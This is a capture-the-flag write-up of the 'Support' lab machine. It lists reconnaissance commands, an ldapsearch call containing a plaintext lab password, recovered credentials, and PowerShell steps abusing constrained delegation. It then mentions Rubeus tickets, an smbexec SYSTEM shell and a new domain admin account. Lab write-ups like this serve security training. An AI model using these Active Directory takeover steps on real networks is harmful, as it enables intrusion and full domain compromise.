Support
Enumeration
Ports and Services
Software Installed:
Nmap Scan Results:
Port 53 - DNS
CMD: dig any @10.10.11.174 support.htb
Port 445 - File Sharing SMB
CMD: smbclient-L //10.10.11.174/
Initial Foothold
Directory of support-tools:
UserInfo.exe
Ran UserInfo.exe with wine and found username/password for ldap lookups with
wireshark
Using ldapsearch and and ldapdomaindump discovered username/password
CMD: ldapsearch -x -H ldap://dc.support.htb -D ‘support\ldap’ -w
‘nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz’ -b
“CN=support,CN=Users,DC=support,DC=htb”
Username: support
Pass: Ironside47pleasure40Watchful
User.txt Proof Screenshot
Privilege Escalation
Used Sharphound/Bloodhound and found that support user has GenericAll
permissions on dc.support.htb
Support is a member of the shared support account group:
Imported Powermad.ps1, created new machine account, and set the account up with Constrained privileges:
- import-module ./Powermad.ps1
- Set-Variable -Name “Pentest” -Value “Pentest01”
- et-Variable -name “targetComputer” -Value “DC”
- Set-ADComputer (Get-Variable -Name “targetComputer”).Value -PrincipalsAllowedToDelegateToAccount ((Get-Variable -Name “Pentest”).Value + ‘$’)
- Get-ADComputer (Get-Variable -Name “targetComputer”).Value -Properties PrincipalsAllowedToDelegateToAccount
Powermad: https://github.com/Kevin-Robertson/Powermad/blob/master/Powermad.ps1
Calculated hashes with Rubeus:
Rubeus: https://github.com/r3motecontrol/Ghostpack-
CompiledBinaries/blob/master/Rubeus.exe
Created a ccache file with the kerberso ticket for administrator. Used smbexec
to get interactive shell as nt authority\system:
Not able to move around:
Created new user wild.coyote and added to domain admin group:
Logged in as wild.coyote with admin rights
RootScreenshot Here:
